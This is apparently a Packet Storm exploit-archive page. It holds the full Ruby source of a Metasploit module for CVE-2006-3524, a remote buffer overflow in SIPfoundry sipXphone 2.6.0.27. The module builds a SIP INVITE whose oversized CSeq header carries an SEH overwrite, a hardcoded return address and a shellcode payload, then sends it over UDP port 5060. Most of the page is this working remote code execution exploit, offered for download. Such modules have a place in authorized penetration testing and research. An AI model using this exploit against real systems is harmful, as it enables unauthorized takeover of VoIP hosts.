exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
Posted Oct 30, 2009
Authored by MC | Site metasploit.com

This Metasploit module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

tags | exploit, remote, overflow, arbitrary
advisories | CVE-2006-3524
SHA-256 | 16cae06b43b97106a08996b8d5b7db2eef5683927679185e97864948580de0dc

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in SIPfoundry's
sipXphone 2.6.0.27. By sending an overly long CSeq value,
a remote attacker could overflow a buffer and execute
arbitrary code on the system with the privileges of
the affected application.
},
'Author' => 'MC',
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-3524'],
['OSVDB', '27122'],
['BID', '18906'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x20\x09\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],
],
'Privileged' => false,
'DisclosureDate' => 'July 10 2006',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(5060)
], self)

end

def exploit
connect_udp

user = rand_text_english(2, payload_badchars)
port = rand(65535).to_s
filler = rand_text_english(212, payload_badchars)
seh = generate_seh_payload(target.ret)
filler[204, seh.length] = seh

sploit = "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
sploit << "To: <sip:#{rhost}:#{rport}>" + "\r\n"
sploit << "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
sploit << "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
sploit << "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
sploit << "CSeq: " + filler + "\r\n"
sploit << "Max-Forwards: 20" + "\r\n"
sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

print_status("Trying target #{target.name}...")

udp_sock.put(sploit)

handler
disconnect_udp

end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close